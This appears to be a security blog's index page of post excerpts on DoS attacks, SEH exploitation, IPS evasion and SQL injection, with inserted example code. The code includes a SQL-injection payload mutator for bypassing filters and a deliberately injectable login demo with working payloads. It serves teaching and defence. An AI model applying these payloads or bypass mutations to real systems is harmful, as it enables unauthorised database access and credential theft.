Posts

Bloody Death DoS-ing

Introduction In this article I am going to explain, at a high level, how to perform an amplified Denial of Service (DoS) attack on a Web Application, but you should be aware that these are real-world scenarios that I have implemented during customer penetration tests. A successful DoS attack on a Web Application should happen at three different layers: the Web Application, the Web Application platform and the Web Server itself. It is common knowledge of course that you don't have to attack all three layers to successfully compromise the availability of a Web Server, but optimizing a DoS attack should be desirable from the perspective of an attacker. By the word optimize I mean four things: reduce to a minimum the number of machines generating malicious traffic; increase the amount of Web Server downtime; increase the remediation time (e.g. recovery time); increase the collateral damage (e.g. break the database). But first I should...

Industrializing Client Side Attacks

Introduction Cybercrime has evolved into an industry whose value in fraud and stolen property exceeded one trillion dollars in 2009. By contrast, in 2007, professional hacking represented a multibillion-dollar industry. What explains this rapid growth? Industrialization. Just as the Industrial Revolution advanced methods and accelerated assembly from single to mass production in the 19th century, today’s cybercrime industry has similarly transformed and automated itself to improve efficiency, scalability, and profitability. The industrialization of hacking coincides with a critical shift in focus. Previously, hackers concentrated attacks on breaking perimeter defences. But today, the goal has changed. The objective is no longer perimeter penetration and defense. Today’s hacker is intent on seizing control of data and the applications that move this data. This is why attacks against Web applications constitute more than 60 percent of total attack attempts observed on the Internet. ...

Over The Flow (Part 4)

Intro This post is the final one in the Over The Flow series (you have to read and understand all three previous posts to figure out what is going on here). I will finally insert and execute shellcode in our vulnerable application. But in this article we will also do further analysis of the SEH exploitation and I will try to describe exactly what happened in order to gain a remote shell. But first we should set the appropriate music:  Note: Paranoia niiiiiiiiice music FYI. Prerequisites To understand everything I'll try to explain to you, you should fulfill the following prerequisites: Basic x86 assembly. Debugging with OllyDbg. Basic knowledge of structured exception handling exploitation. Note: Of course you would also have to read the previous three parts. Again a little about Structured Exception Handling (as a reminder) The Structured Exception Handler (SEH) is used to handle exceptions within Windows prog...

The Teenage Mutant Ninja Turtles project....

Intro Elusive Thoughts is proud to present The Teenage Mutant Ninja Turtles project.... What is Teenage Mutant Ninja Turtles? The Teenage Mutant Ninja Turtles project is three things: a Web Application payload database (heavily based on the fuzzdb project for now), a Web Application error database, and a Web Application payload mutator. Nowadays all high-profile sites in the financial and telecommunication sectors use filters that try to block injection attacks such as SQL injection, XSS, XXE, HTTP header injection etc. In this particular project I am going to provide you with a tool to generate obfuscated fuzzing injection attacks in order to bypass badly implemented Web Application injection filters (e.g. SQL injection and XSS filters). When you test a Web Application all you need is a fuzzer and ammunition: "I saw clearly that war was upon us when I learned that my young men had been secretly buying ammunition." Chief Joseph Ammunit...
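As an added example, and not code from the Teenage Mutant Ninja Turtles project itself, here is a minimal payload mutator of the kind the excerpt describes: it applies a handful of obfuscation rules to one SQL injection payload, singly and in pairs, and reports which variants slip past a constructed toy filter that does case-sensitive substring matching on the raw, undecoded input. The filter, the rules and the payload are assumptions chosen for illustration; whether a mutated payload still parses depends on the target DBMS (tabs as whitespace and `#` comments are MySQL behaviour).

```python
"""Added example, not code from the Teenage Mutant Ninja Turtles project.

Mutates one SQL injection payload with a few obfuscation rules and reports
which variants bypass a toy, badly implemented input filter. The filter,
the rules and the payload are assumptions made for illustration.
"""
import itertools
import urllib.parse

# Constructed toy filter: case-sensitive substring match on the raw input,
# applied before URL decoding. Both mistakes are common in home-grown filters.
BLOCKED_TOKENS = ("' OR ", "UNION SELECT", "--", "/*")

# Constructed sample payload (authentication bypass plus data extraction).
BASE_PAYLOAD = "' OR 1=1 UNION SELECT user,password FROM users --"


def naive_filter_blocks(payload):
    """Return True if the toy filter would reject the payload."""
    return any(token in payload for token in BLOCKED_TOKENS)


def alt_case(p):
    """Alternate letter case; defeats case-sensitive keyword matching."""
    return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(p))


def tab_space(p):
    """Replace spaces with tabs; the SQL parser treats both as whitespace."""
    return p.replace(" ", "\t")


def hash_comment(p):
    """Use a MySQL-style '#' comment terminator instead of '--'."""
    return p.replace("--", "#")


def url_encode(p):
    """Percent-encode everything that is not unreserved; bypasses filters
    that inspect the input before the web server decodes it."""
    return urllib.parse.quote(p, safe="")


def union_all(p):
    """Rewrite UNION SELECT as UNION ALL SELECT, which is still valid SQL."""
    return p.replace("UNION SELECT", "UNION ALL SELECT")


MUTATORS = {
    "alt_case": alt_case,
    "tab_space": tab_space,
    "hash_comment": hash_comment,
    "url_encode": url_encode,
    "union_all": union_all,
}


def mutate(payload, names):
    """Apply the named mutators in order and return the result."""
    for name in names:
        payload = MUTATORS[name](payload)
    return payload


def find_bypasses(payload, max_depth=2):
    """Try every combination of up to max_depth mutators (in dictionary order)
    and return [(names, mutated_payload)] for those the filter lets through."""
    hits = []
    for depth in range(1, max_depth + 1):
        for names in itertools.combinations(MUTATORS, depth):
            mutated = mutate(payload, names)
            if not naive_filter_blocks(mutated):
                hits.append((names, mutated))
    return hits


if __name__ == "__main__":
    for names, mutated in find_bypasses(BASE_PAYLOAD):
        print("+".join(names), "->", repr(mutated))
```

No single rule gets past this filter (every variant still carries either the `--` or a recognisable keyword), but three pairs do, which is exactly why a mutator that composes rules is more useful than a list of fixed payloads.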

Hacking the Session for fun and profit

Intro This post describes, from the security perspective, how the life cycle of a Web Application session should look. By life cycle I mean all the stages a session goes through and the steps to be taken in order to properly test the session. Very recently I had a discussion about session management with a colleague of mine and he seemed confused about what session management is and how it should be handled. Now if you look up the OWASP session management cheat sheet you are going to find lots of interesting information overlapping with the information presented here, but there is no complete and easy-to-understand guide on the internet about how to test a session. What is a Session and how should it behave A web application session is a user credential "representative" for as long as the user is logged in (well, not always). In simpler words, after a successful login the user credentials should be translated into one or more cry...
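The session life cycle the excerpt talks about, as an added example that is not code from the original post: a minimal server-side session store that issues a fresh random id at login (discarding any id the client presented beforehand), rotates the id on privilege change, enforces idle and absolute timeouts, and invalidates server-side on logout, plus the check a tester would run on the id itself. The timeout values and the injectable clock are assumptions made for illustration.

```python
"""Added example, not code from the original post: a minimal server-side
session store implementing the life cycle described above. The timeouts
and the injectable clock are assumptions chosen for illustration."""
import base64
import secrets
import time

IDLE_TIMEOUT = 15 * 60          # seconds without a request before expiry (assumed)
ABSOLUTE_TIMEOUT = 8 * 60 * 60  # hard lifetime regardless of activity (assumed)


class SessionStore:
    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}  # session id -> {"user", "created", "last_seen"}

    @staticmethod
    def _new_id():
        # 32 random bytes from the OS CSPRNG, base64url-encoded (43 chars).
        return secrets.token_urlsafe(32)

    def login(self, user, pre_auth_sid=None):
        """Create a session after successful authentication. Any id the
        client presented before logging in is discarded, never upgraded,
        which closes session fixation."""
        self._sessions.pop(pre_auth_sid, None)
        now = self._clock()
        sid = self._new_id()
        self._sessions[sid] = {"user": user, "created": now, "last_seen": now}
        return sid

    def validate(self, sid):
        """Return the user bound to a live session, or None. Idle and
        absolute timeouts are enforced here and expired sessions destroyed."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self._clock()
        if now - s["last_seen"] > IDLE_TIMEOUT or now - s["created"] > ABSOLUTE_TIMEOUT:
            del self._sessions[sid]
            return None
        s["last_seen"] = now
        return s["user"]

    def rotate(self, sid):
        """Issue a new id for an existing session and retire the old one.
        Call after any privilege change (login, role switch, password change)."""
        s = self._sessions.pop(sid, None)
        if s is None:
            return None
        new_sid = self._new_id()
        self._sessions[new_sid] = s
        return new_sid

    def logout(self, sid):
        """Invalidate server-side; deleting the client cookie alone is not enough."""
        return self._sessions.pop(sid, None) is not None


def token_is_strong(sid, min_bytes=16):
    """Tester's check: a session id should carry at least 128 bits of
    randomness, i.e. it base64url-decodes to at least min_bytes bytes."""
    try:
        raw = base64.urlsafe_b64decode(sid + "=" * (-len(sid) % 4))
    except (ValueError, TypeError):
        return False
    return len(raw) >= min_bytes
```

When testing a real application the same steps map onto black-box checks: log in twice and confirm the ids differ and are long enough, confirm the pre-login id is not kept after login, confirm a rotated or logged-out id is rejected by the server and not merely cleared from the browser, and confirm both timeouts actually expire the session.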

Ask and you shall receive (Part 2)

Intro This article is the second part of the "Ask and you shall receive" series. Almost a month ago I received a comment from tborland1 and he/she was kind enough to explain to me that the first article had nothing to do with bypassing IPS/IDS devices, which by the way is true. But it did explain rapid payload delivery and it did mention that the fragroute tool (and some other tools) can be used to bypass this type of device, so in this article I will show more specifically how to bypass the Symantec Endpoint IPS/IDS software. But most importantly, I did explain from scratch the underlying technologies and the basic concept, which by the way is that a buffer overflow is a simple string just like an SQL injection string and that you can manipulate that string to do WHATEVER YOU WANT with it. But before I start talking about buffer overflow obfuscation I will first talk about the different stages a buffer overflow goes through before reaching the target mach...

Obfuscate SQL Fuzzing for fun and profit

Introduction Cyber criminals are increasingly using automated SQL injection attacks powered by botnets and AI-assisted tooling to hit vulnerable systems. SQL injection remains one of the most reliable ways to compromise front-end web applications and back-end databases, and it continues to hold its position in the OWASP Top 10 (A03:2021, Injection). Despite decades of awareness, the attack surface keeps expanding, not shrinking. But why does this keep happening? The answer is straightforward: we are living in an era of industrialized hacking. SQL injection attacks are carried out by submitting crafted SQL fragments through front-end web application input fields whose values are pasted into queries that run under the application's database account, tricking the database into granting more access than the developer intended. The reason for the sustained prevalence of SQL injection is twofold: first, criminals are using automated and manual SQL injection attacks powered by botnets, professional hackers, and now AI-driven fuzzing tools t...
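The mechanism the excerpt describes (input pasted into a query and parsed as SQL), as an added example that is not code from the original post: the same login query written with string concatenation and with bound parameters, run against an in-memory SQLite database constructed here. The table, the two users and the payloads are assumptions for illustration; the vulnerable function is deliberately injectable so the two results can be compared.

```python
"""Added example, not code from the original post: the same login query
written with string concatenation (injectable) and with bound parameters,
run against an in-memory SQLite database built here for illustration."""
import sqlite3


def setup_db():
    """Constructed sample data: two users, one of them an admin."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Input is pasted into the SQL text, so quotes, comments and UNION in the
    input become part of the query's grammar. Deliberately injectable."""
    sql = (
        "SELECT username, role FROM users "
        "WHERE username = '%s' AND password = '%s'" % (username, password)
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """Bound parameters: the driver sends the values separately from the
    statement, so they can only ever be compared, never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


# Constructed payloads: authentication bypass, tautology, and data extraction.
BYPASS_USER = "alice' --"
TAUTOLOGY_USER = "' OR 1=1 --"
UNION_USER = "' UNION SELECT username, password FROM users --"

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable / bypass    :", login_vulnerable(db, BYPASS_USER, "wrong"))
    print("vulnerable / tautology :", login_vulnerable(db, TAUTOLOGY_USER, "wrong"))
    print("vulnerable / union     :", login_vulnerable(db, UNION_USER, "wrong"))
    print("safe / bypass          :", login_safe(db, BYPASS_USER, "wrong"))
    print("safe / real creds      :", login_safe(db, "alice", "s3cret"))
```

The `--` in each payload comments out the rest of the original `WHERE` clause, which is why the password check never runs in the vulnerable version; the parameterised version returns nothing for any of the payloads because the whole string is compared as a username.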